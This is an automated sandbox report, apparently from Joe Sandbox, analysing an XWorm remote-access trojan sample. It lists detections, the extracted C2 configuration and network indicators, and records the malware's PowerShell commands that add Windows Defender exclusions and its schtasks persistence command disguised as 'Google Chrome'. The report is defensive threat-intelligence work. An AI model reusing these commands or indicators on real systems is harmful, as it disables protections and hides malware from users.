Windows Analysis Report
ra66DSpa.exe

Overview

General Information

Sample name: ra66DSpa.exe
Analysis ID: 1525343
MD5: 12ac7eecca99175c8953b8368d96440e
SHA1: aa6fcf14c66644111d1160a6dd4cdb67c58e709a
SHA256: 9d7a88aa72820977134b39b0ae1907fd738de184b89ce72fbb77cee530a10e49
Tags: exe, xworm

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ra66DSpa.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\ra66DSpa.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
    • powershell.exe (PID: 2308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7060 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Google Chrome.exe (PID: 1456 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • Google Chrome.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • Google Chrome.exe (PID: 6992 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • Google Chrome.exe (PID: 1756 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • cleanup

Malware configuration (XWorm):
{"C2 url": "https://pastebin.com/raw/hhG5zGXd", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara matches

Source | Rule | Description | Author | Strings
ra66DSpa.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
ra66DSpa.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1101f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x110bc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x111d1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10427:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Google Chrome.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Google Chrome.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1101f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x110bc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x111d1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10427:$cnc4: POST / HTTP/1.1
00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10e1f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10ebc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10fd1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10227:$cnc4: POST / HTTP/1.1
Process Memory Space: ra66DSpa.exe PID: 4540 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.ra66DSpa.exe.6b0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.ra66DSpa.exe.6b0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1101f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x110bc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x111d1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10427:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Google Chrome.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ra66DSpa.exe, ProcessId: 4540, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Chrome
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe", ProcessId: 7060, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T01:48:03.617687+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 53844 | 147.185.221.21 | 42956 | TCP

AV Detection

Source: ra66DSpa.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Google Chrome.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: ra66DSpa.exe | Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/hhG5zGXd", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Local\Google Chrome.exe | ReversingLabs: Detection: 68%
Source: ra66DSpa.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Google Chrome.exe | Joe Sandbox ML: detected
Source: ra66DSpa.exe | Joe Sandbox ML: detected
Source: ra66DSpa.exe | String decryptor: https://pastebin.com/raw/hhG5zGXd
Source: ra66DSpa.exe | String decryptor: <123456789>
Source: ra66DSpa.exe | String decryptor: <Xwormmm>
Source: ra66DSpa.exe | String decryptor: XWorm V5.2
Source: ra66DSpa.exe | String decryptor: USB.exe
Source: ra66DSpa.exe | String decryptor: %LocalAppData%
Source: ra66DSpa.exe | String decryptor: Google Chrome.exe
Source: ra66DSpa.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:53843 version: TLS 1.2
Source: ra66DSpa.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:53844 -> 147.185.221.21:42956
Source: Malware configuration extractor | URLs: https://pastebin.com/raw/hhG5zGXd
Source: unknown | DNS query: name: pastebin.com
Source: global traffic | TCP traffic: 147.185.221.21 ports 42956,2,4,5,6,9
Source: global traffic | TCP traffic: 192.168.2.6:53844 -> 147.185.221.21:42956
Source: global traffic | HTTP traffic detected: GET /raw/hhG5zGXd HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | IP Address: 147.185.221.21
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /raw/hhG5zGXd HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: stay-brook.gl.at.ply.gg
Source: powershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2283007874.000001B4F371A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: ra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: Google Chrome.exe, 00000013.00000002.2890393554.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/hhG5zGXd
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53843
Source: unknown | Network traffic detected: HTTP traffic on port 53843 -> 443
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:53843 version: TLS 1.2

Operating System Destruction

Source: C:\Users\user\Desktop\ra66DSpa.exe | Process information set: 01 00 00 00

            System Summary

            barindex
            Source: ra66DSpa.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348AACA50_2_00007FFD348AACA5
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A99B20_2_00007FFD348A99B2
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A8C060_2_00007FFD348A8C06
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A69550_2_00007FFD348A6955
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A1DCA0_2_00007FFD348A1DCA
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A0EFA0_2_00007FFD348A0EFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489947D2_2_00007FFD3489947D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34898E2C2_2_00007FFD34898E2C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489BC4A2_2_00007FFD3489BC4A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD349630E92_2_00007FFD349630E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A5CFA5_2_00007FFD348A5CFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A34FA5_2_00007FFD348A34FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348AACF25_2_00007FFD348AACF2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A347D5_2_00007FFD348A347D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A89F25_2_00007FFD348A89F2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A25FD5_2_00007FFD348A25FD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34972E115_2_00007FFD34972E11
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348A8E258_2_00007FFD348A8E25
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD349773428_2_00007FFD34977342
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD348A957410_2_00007FFD348A9574
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD348A8EFA10_2_00007FFD348A8EFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34972E1110_2_00007FFD34972E11
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 16_2_00007FFD348B0EFA16_2_00007FFD348B0EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 16_2_00007FFD348B1DCA16_2_00007FFD348B1DCA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 17_2_00007FFD34890EFA17_2_00007FFD34890EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 17_2_00007FFD34891DCA17_2_00007FFD34891DCA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 18_2_00007FFD348B0EFA18_2_00007FFD348B0EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 18_2_00007FFD348B1DCA18_2_00007FFD348B1DCA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 19_2_00007FFD34890EFA19_2_00007FFD34890EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 19_2_00007FFD34891DCA19_2_00007FFD34891DCA
            Source: ra66DSpa.exe, 00000000.00000000.2096237642.00000000006C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exeP vs ra66DSpa.exe
            Source: ra66DSpa.exeBinary or memory string: OriginalFilenameXClient.exeP vs ra66DSpa.exe
            Source: ra66DSpa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ra66DSpa.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: ra66DSpa.exe, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.csCryptographic APIs: 'TransformFinalBlock'
            Source: ra66DSpa.exe, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: ra66DSpa.exe, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: Google Chrome.exe.0.dr, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.csCryptographic APIs: 'TransformFinalBlock'
            Source: Google Chrome.exe.0.dr, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
            Source: Google Chrome.exe.0.dr, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csCryptographic APIs: 'TransformFinalBlock'
